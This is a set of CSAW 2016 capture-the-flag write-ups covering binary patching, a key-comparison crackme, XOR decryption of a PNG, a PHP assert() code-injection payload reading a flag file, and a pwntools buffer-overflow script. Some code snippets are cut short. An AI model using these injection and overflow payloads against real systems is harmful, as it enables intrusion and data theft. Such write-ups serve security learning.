[CSAW 2016] Gametime Writeup



Guess what time it is! That’s right! Gametime! Wowwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww!!!!!!!!!!!!

Author: Brad Antoniewicz

note: flag is not in flag{} format


To be honest, I downloaded the file, played the game once and got the key. It is possible for humans to win the game, or maybe it’s just my Super-Vegan powers LOL.
But I wanted, of course, to get the key using RE. I opened IDA and searched for interesting strings.
.rdata:00A17858 00000014 C \rGet ready to play\n                                     
.rdata:00A17970 00000033 C \rZOMGZOMG           YOU DID IT!!!        ZOMGOZMG\n      
.rdata:00A179E0 0000000F C key is %s (%s)                                            
.rdata:00A179F4 0000002C C \nWhen you see an 's', press the space bar\n\n            
.rdata:00A17A20 0000002C C \nWhen you see an '%c', press the '%c' key\n\n            
.rdata:00A17A50 00000010 C key is %s (%s)\r                                          
.rdata:00A17A60 0000002B C \rUDDER FAILURE! http://imgur.com/4Ajx21P \n              
.rdata:00A17A8C 00000024 C \r                                 \r                     
.rdata:00A17AB0 0000002A C UDDER FAILURE! http://imgur.com/4Ajx21P \n                
.rdata:00A17ADC 00000005 C %02x                                                      
.rdata:00A17B20 00000010 C \tkey is %s (%s)                                          
.rdata:00A17B30 00000034 C \r\tZOMGZOMG                                ZOMGZOMG\n    
.rdata:00A17B64 00000034 C \r\tZOMGZOMG     TAP TAP REVOLUTION!!!!!!!  ZOMGZOMG\n    
.rdata:00A17BD0 00000020 C \r\t              R U READDY?!\n\n\n                      
.rdata:00A17BF0 0000001D C \rThe game is starting in...\n                            
.rdata:00A17C10 00000033 C \rTRAINING COMPLETE!                              \n      
.rdata:00A17C48 0000002A C \rNow you know everything you need to know                
.rdata:00A17C74 0000001F C \n\n\nfor the rest of your life!\n                        
.rdata:00A17C94 0000000D C LETS PLAY !\n                                             
.rdata:00A17CA4 00000016 C \rooooh, you fancy!!!\n                                   
.rdata:00A17CBC 00000011 C NIIICE JOB)!!!!\n                                         
.rdata:00A17CD0 00000012 C \rTURBO TIME!    \n

I highlighted the important lines: The success message (I know, I got it when I played) and the failure messages. Using X-Refs I found where the failure messages are printed out and patched the program to jump to the success instead. Notice that you’ll need to change two functions.

1st jump to change:


2nd jump to change:


Now apply the patches to the program and run it. Let the game play alone and the key will be printed.

The key is: (no5c30416d6cf52638460377995c6a8cf5)

[CSAW 2016] Key Writeup



So I like to make my life difficult, and instead of a password manager, I make challenges that keep my secrets hidden. I forgot how to solve this one and it is the key to my house… Can you help me out? It’s getting a little cold out here.

NOTE: Flag is not in normal flag format.

Running the file we end up with a message: “?W?h?a?t h?a?p?p?e?n?”
Let’s open the exe in IDA and view it’s strings looking for interesting strings.
.rdata:00AB52B8 00000029 C C:\\Users\\CSAW2016\\haha\\flag_dir\\flag.txt
.rdata:00AB52E4 00000016 C ?W?h?a?t h?a?p?p?e?n?                        
.rdata:00AB52FC 00000021 C |------------------------------|             
.rdata:00AB5320 00000021 C |==============================|             
.rdata:00AB5344 00000021 C \\  /\\  /\\  /\\  /\\==============|        
.rdata:00AB5368 00000021 C  \\/  \\/  \\/  \\/  \\=============|        
.rdata:00AB538C 00000021 C                  |-------------|             
.rdata:00AB53B0 00000015 C Congrats You got it!                         
.rdata:00AB53C8 00000012 C =W=r=o=n=g=K=e=y=

We have 4 interesting strings:

  • A path: C:\\Users\\CSAW2016\\haha\\flag_dir\\flag.txt
  • The known message: ?W?h?a?t h?a?p?p?e?n?
  • Good key: Congrats You got it!
  • Bad key: =W=r=o=n=g=K=e=y=

Visiting the function that uses the path string (X-ref) we understand the program is trying to read the key from it, if it doesn’t exists we would get: ?W?h?a?t h?a?p?p?e?n?

I Created the txt file with “aaa” inside and ran again, this time I set a breakpoint before the decision whether to jump to the success or failure message.


Now let’s see what we have in what seem like the comparison function.

Stepping the lines we can see that my “aaa” is compared with a string.


This string is the key “idg_cni~bjbfi|gsxb” and also the flag to the challenge.


[CSAW 2016] Sleeping Guard Writeup



Only true hackers can see the image in this magic PNG….
nc crypto.chal.csaw.io 8000

Author: Sophia D’Antoine

We are given with python script, Netcat command and a hint about a PNG file. Let’s run Netcat and see what we will get:

[Megabeets] /tmp/CSAW/clam# nc crypto.chal.csaw.io 8000
<alot of base64 text here>

We received a base64 encoded text from the server. It is probably our image so let’s decode it and save it to file:

[Megabeets]$> nc crypto.chal.csaw.io 8000 | base64 --decode > out.png

Trying to open the image we faced with an error, our image-viewer could not open the file. Open the file with text viewer and see that there is no PNG header. So, we have the image but it somehow encoded and we need to find out how to decode it. Let’s look at the script, the answer will probably be there. It’s not so long so I attached it here:

import base64
from twisted.internet import reactor, protocol
import os

PORT = 9013

import struct
def get_bytes_from_file(filename):  
    return open(filename, "rb").read()  

def length_encryption_key():
    return len(KEY)

def get_magic_png():
    image = get_bytes_from_file("./sleeping.png")
    encoded_string = base64.b64encode(image)
    key_len = length_encryption_key()
    print 'Sending magic....'
    if key_len != 12:
        return ''
    return encoded_string 

class MyServer(protocol.Protocol):
    def connectionMade(self):
        resp = get_magic_png()

class MyServerFactory(protocol.Factory):
    protocol = MyServer

factory = MyServerFactory()
reactor.listenTCP(PORT, factory)

Look at the highlighted rows. You can see that after encoding the file with base64 the script is checking whether the size of the encryption key is 12 . We don’t see any encryption in the script except the encoding itself but we can assume that in the original script an encryption is done using 12 bytes long key. But what encryption? There are billion of options, how can we find the right decryption algorithm to use? Well, the answer is simple – this is a CTF and the admins know that we cannot try all the possible decryption methods so it will probably be the banal option: XOR.

After choosing our encryption method let’s think how can we find the key itself. We know the file is a PNG image, so we can XOR the first 12 bytes of the encrypted flle with the first 12 bytes of normal PNG file.

89 50 4E 47 0D 0A 1A 0A 00 00 00 0D XOR DE 3F 0F 2F 52 4B 45 41 65 79 21 32 == 57 6F 41 68 5F 41 5F 4B 65 79 21 3F  

which  in ASCII is: “WoAh_A_Key!?”

Now that we have the key we can let python do it’s magic:

def xor(data, key):
    l = len(key)
    return bytearray((
        (data[i] ^ key[i % l]) for i in range(0,len(data))

# Read the encrypted image as bytearray
data = bytearray(open('out.png', 'rb').read())

# This is our key as bytearray: "WoAh_A_Key!?"
key = bytearray([0x57, 0x6f, 0x41, 0x68, 0x5f, 0x41, 0x5f, 0x4b, 0x65, 0x79, 0x21, 0x3f])

with open('decrypted.png', 'w') as file_:

And you’ll get the image and the flag:


[CSAW 2016] mfw Writeup



Hey, I made my first website today. It’s pretty cool and web7.9.


Entering the site, the first thing that comes to mind is a LFI attack. The site is including a page which is requested in the URL.

The following table describes the possible respond pages:

URL Result
http://web.chal.csaw.io:8000/?page=home The “home” page is shown.
http://web.chal.csaw.io:8000/?page=about The “about” page is shown.
http://web.chal.csaw.io:8000/?page=contact The “contact” page is shown.
http://web.chal.csaw.io:8000/?page=Megabeets Just a message saying: “That file doesn’t exist!”
http://web.chal.csaw.io:8000/?page=flag An empty page is shown inside the website.
http://web.chal.csaw.io:8000/?page=../../../../etc/passwd Just a message saying: “Detected hacking attempt!”

Looking at the source code i saw the following comment:

<!--<li ><a href="?page=flag">My secrets</a></li> -->

Ok, I need to get the “flag” page but any LFI technique I tried didn’t work. I thought about something else, In the “about” page the creator of the site mentioned that it was built using git. So let’s see if I am able to download the repository. The page http://web.chal.csaw.io:8000/.git/config exists so I downloaded the repository using DVCS-RIPPER.

You can find index.php here.

So the page is using assert() which is vulnerable to Command Injection attack. After a little trial and error I came up with the answer:

(Invoke-WebRequest "http://web.chal.csaw.io:8000/?page=Megabeets') || var_dump(file_get_contents('templates/flag.php'));// Comment").Content

And received the flag:

string(52) "<?php $FLAG="flag{3vald_@ss3rt_1s_best_a$$ert}"; ?>
Detected hacking attempt!

If you try entering the url in a browser, look in the source of the page (CTRL+U), the flag is commented.

[CSAW 2016] PWN: Warmup Writeup



So you want to be a pwn-er huh? Well let’s throw you an easy one 😉
nc pwn.chal.csaw.io 8000


Let’s connect to the server and play with it a little bit:

[Meabeets] /tmp/CSAW/Warmup# nc pwn.chal.csaw.io 8000
-Warm Up-

[Meabeets] /tmp/CSAW/Warmup# nc pwn.chal.csaw.io 8000
-Warm Up-

[Meabeets] /tmp/CSAW/Warmup# nc pwn.chal.csaw.io 8000
-Warm Up-

The program says “WOW:” followed by a memory address. This address is probably the address of the function we need to execute. Let’s open IDA to view the code:

int __cdecl main(int argc, const char **argv, const char **envp)
	  char s; // [sp+0h] [bp-80h]@1
	  char v5; // [sp+40h] [bp-40h]@1

	  write(1, "-Warm Up-\n", 0xAuLL);
	  write(1, "WOW:", 4uLL);
	  sprintf(&s, "%p\n", 4195853LL);
	  write(1, &s, 9uLL);
	  write(1, (const void *)'@\aU', 1uLL);
	  return gets(&v5, '>');

This is a classic BOF (Buffer Overflow) case. The main method uses the gets() function to receive the given input and returns it. gets() is storing 64 characters (40h). Because there is no validation of the given string we need to supply an input that will exploit the program and make it jump to the wanted address: 0x40060d.

A short python script will do the job:

from pwn import *

r = remote('pwn.chal.csaw.io', 8000)
print r.recv()
r.sendline("A"*72 + "\x0D\x06\x40\x00\x00\x00\x00\x00")
print r.recvline()

And we got the flag: FLAG{LET_US_BEGIN_CSAW_2016}